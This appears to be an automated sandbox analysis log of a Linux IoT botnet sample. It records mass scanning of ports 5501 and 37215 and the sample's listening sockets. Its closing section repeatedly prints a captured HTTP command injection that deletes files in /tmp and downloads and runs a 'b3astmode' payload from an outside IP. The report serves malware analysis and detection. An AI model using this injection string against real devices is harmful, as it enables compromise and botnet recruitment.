    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 197.116.127.200:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 67.12.228.174:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 5.254.243.128:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 219.77.57.14:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 13.17.92.150:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 50.29.137.61:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 73.149.34.57:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 201.247.156.65:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 177.38.201.241:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 122.180.60.247:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 179.5.237.66:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 156.78.72.85:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 166.192.171.59:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 109.66.1.241:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 135.109.81.171:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 163.188.168.106:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 112.210.54.75:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 17.3.100.103:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 178.52.5.253:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 98.7.172.83:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 182.160.121.192:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 156.218.203.209:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 65.53.13.172:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 116.116.72.12:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 148.213.228.159:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 23.57.139.105:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 189.254.209.236:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 175.231.91.111:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 38.123.61.117:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 145.129.171.0:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 23.193.69.141:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 49.217.155.222:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 79.83.11.255:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 99.131.105.237:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 196.119.148.219:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 153.17.123.168:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 168.91.128.193:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 106.153.85.244:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 4.46.233.14:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 204.232.0.37:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 169.222.237.147:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 8.208.14.126:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 64.64.189.201:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 84.214.248.56:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 76.68.255.247:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 88.219.90.99:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 110.116.98.46:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 183.28.9.63:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 159.8.160.207:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 118.206.83.194:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 39.97.146.245:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 200.190.162.74:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 8.210.165.229:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 93.82.28.91:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 150.197.23.66:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 196.10.214.207:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 151.255.33.34:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 204.40.232.238:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 140.149.118.72:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 217.159.93.2:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 73.171.175.113:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 135.168.12.95:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 45.49.104.219:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 85.233.31.6:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 128.214.40.203:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 143.240.41.158:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 85.213.215.56:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 96.122.21.221:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 102.162.149.200:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 124.71.41.214:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 68.143.72.99:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 8.192.64.248:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 61.236.219.55:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 113.120.202.209:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 154.29.128.214:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 101.177.25.171:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 152.109.116.133:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 128.199.70.131:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 138.94.186.223:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 178.5.193.26:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 156.222.47.158:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 126.231.14.242:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 134.107.237.9:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 70.97.51.184:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 125.109.23.46:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 137.33.93.166:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 84.38.111.37:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 132.78.225.218:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 58.20.225.157:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 144.3.91.247:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 136.186.249.252:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 180.18.4.77:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 190.11.162.236:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 187.84.156.98:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 9.41.66.223:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 126.182.62.59:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 210.186.202.241:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 136.99.214.142:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 99.227.45.146:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 17.139.192.6:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 24.39.77.146:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 101.245.241.252:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 171.235.1.162:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 211.213.146.33:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 12.114.119.65:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 70.154.216.84:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 188.236.253.42:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 12.217.87.141:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 145.86.13.252:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 68.25.230.15:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 46.151.115.6:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 178.217.26.203:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 19.81.37.95:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 136.236.242.178:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 219.138.123.65:5501
    Source: global trafficTCP traffic: 192.168.2.23:30311 -> 147.193.68.183:5501
    Source: global trafficTCP traffic: 192.168.2.23:42164 -> 5.199.130.247:34241
    Source: global trafficTCP traffic: 192.168.2.23:30309 -> 186.35.231.137:37215
    Source: global trafficTCP traffic: 192.168.2.23:30309 -> 186.107.86.222:37215
    Source: global trafficTCP traffic: 192.168.2.23:30309 -> 186.85.181.158:37215
    Source: global trafficTCP traffic: 192.168.2.23:30309 -> 186.246.138.237:37215
    Source: global trafficTCP traffic: 192.168.2.23:30309 -> 186.96.68.19:37215
    Source: global trafficTCP traffic: 192.168.2.23:30309 -> 186.73.58.88:37215
    Source: global trafficTCP traffic: 192.168.2.23:30309 -> 186.142.71.35:37215
    Source: global trafficTCP traffic: 192.168.2.23:30309 -> 186.163.200.5:37215
    Source: global trafficTCP traffic: 192.168.2.23:30309 -> 186.169.194.27:37215
    Source: global trafficTCP traffic: 192.168.2.23:30309 -> 186.89.113.152:37215
    Source: global trafficTCP traffic: 192.168.2.23:30309 -> 186.120.249.67:37215
    Source: global trafficTCP traffic: 192.168.2.23:30309 -> 186.57.236.190:37215
    Source: global trafficTCP traffic: 192.168.2.23:30309 -> 186.153.153.193:37215
    Source: global trafficTCP traffic: 192.168.2.23:30309 -> 186.147.223.198:37215
    Source: global trafficTCP traffic: 192.168.2.23:30309 -> 186.220.110.217:37215
    Source: global trafficTCP traffic: 192.168.2.23:30309 -> 186.50.162.202:37215
    Source: global trafficTCP traffic: 192.168.2.23:30309 -> 186.227.69.30:37215
    Source: global trafficTCP traffic: 192.168.2.23:30309 -> 186.108.248.231:37215
    Source: global trafficTCP traffic: 192.168.2.23:30309 -> 186.158.155.96:37215
    Source: global trafficTCP traffic: 192.168.2.23:30309 -> 186.204.28.228:37215
    Source: /tmp/gHQh80mu53 (PID: 5220)Socket: 127.0.0.1::61341Jump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5224)Socket: 0.0.0.0::23Jump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5224)Socket: 0.0.0.0::22Jump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5224)Socket: 0.0.0.0::80Jump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5224)Socket: 0.0.0.0::81Jump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5224)Socket: 0.0.0.0::8443Jump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5224)Socket: 0.0.0.0::9009Jump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)Socket: 0.0.0.0::23Jump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)Socket: 0.0.0.0::22Jump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)Socket: 0.0.0.0::80Jump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)Socket: 0.0.0.0::81Jump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)Socket: 0.0.0.0::8443Jump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)Socket: 0.0.0.0::9009Jump to behavior
    Source: /usr/sbin/sshd (PID: 5257)Socket: [::]::22Jump to behavior
    Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
    Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
    Source: unknownTCP traffic detected without corresponding DNS query: 197.83.172.67
    Source: unknownTCP traffic detected without corresponding DNS query: 197.200.240.67
    Source: unknownTCP traffic detected without corresponding DNS query: 197.228.223.125
    Source: unknownTCP traffic detected without corresponding DNS query: 197.55.21.121
    Source: unknownTCP traffic detected without corresponding DNS query: 197.175.137.224
    Source: unknownTCP traffic detected without corresponding DNS query: 197.217.99.254
    Source: unknownTCP traffic detected without corresponding DNS query: 197.16.36.144
    Source: unknownTCP traffic detected without corresponding DNS query: 197.25.205.170
    Source: unknownTCP traffic detected without corresponding DNS query: 197.136.155.101
    Source: unknownTCP traffic detected without corresponding DNS query: 197.225.205.199
    Source: unknownTCP traffic detected without corresponding DNS query: 197.26.101.18
    Source: unknownTCP traffic detected without corresponding DNS query: 197.85.227.188
    Source: unknownTCP traffic detected without corresponding DNS query: 197.80.245.154
    Source: unknownTCP traffic detected without corresponding DNS query: 197.254.156.227
    Source: unknownTCP traffic detected without corresponding DNS query: 197.150.156.25
    Source: unknownTCP traffic detected without corresponding DNS query: 197.70.121.8
    Source: unknownTCP traffic detected without corresponding DNS query: 197.215.158.67
    Source: unknownTCP traffic detected without corresponding DNS query: 197.72.174.255
    Source: unknownTCP traffic detected without corresponding DNS query: 197.133.237.253
    Source: unknownTCP traffic detected without corresponding DNS query: 197.225.22.129
    Source: unknownTCP traffic detected without corresponding DNS query: 197.128.188.48
    Source: unknownTCP traffic detected without corresponding DNS query: 197.253.95.77
    Source: unknownTCP traffic detected without corresponding DNS query: 197.184.243.148
    Source: unknownTCP traffic detected without corresponding DNS query: 197.225.178.14
    Source: unknownTCP traffic detected without corresponding DNS query: 197.207.163.57
    Source: unknownTCP traffic detected without corresponding DNS query: 197.201.15.151
    Source: unknownTCP traffic detected without corresponding DNS query: 197.67.146.179
    Source: unknownTCP traffic detected without corresponding DNS query: 197.255.24.79
    Source: unknownTCP traffic detected without corresponding DNS query: 197.161.199.236
    Source: unknownTCP traffic detected without corresponding DNS query: 197.154.33.76
    Source: unknownTCP traffic detected without corresponding DNS query: 197.255.87.186
    Source: unknownTCP traffic detected without corresponding DNS query: 197.200.5.160
    Source: unknownTCP traffic detected without corresponding DNS query: 197.165.49.96
    Source: unknownTCP traffic detected without corresponding DNS query: 197.159.218.195
    Source: unknownTCP traffic detected without corresponding DNS query: 197.17.242.33
    Source: unknownTCP traffic detected without corresponding DNS query: 197.46.115.156
    Source: unknownTCP traffic detected without corresponding DNS query: 197.140.132.251
    Source: unknownTCP traffic detected without corresponding DNS query: 197.66.67.146
    Source: unknownTCP traffic detected without corresponding DNS query: 197.126.225.1
    Source: unknownTCP traffic detected without corresponding DNS query: 197.42.136.175
    Source: unknownTCP traffic detected without corresponding DNS query: 197.71.177.182
    Source: unknownTCP traffic detected without corresponding DNS query: 197.172.14.4
    Source: unknownTCP traffic detected without corresponding DNS query: 197.172.36.216
    Source: unknownTCP traffic detected without corresponding DNS query: 197.221.122.210
    Source: unknownTCP traffic detected without corresponding DNS query: 197.254.197.75
    Source: unknownTCP traffic detected without corresponding DNS query: 197.220.205.203
    Source: unknownTCP traffic detected without corresponding DNS query: 197.177.222.124
    Source: unknownTCP traffic detected without corresponding DNS query: 197.7.111.138
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
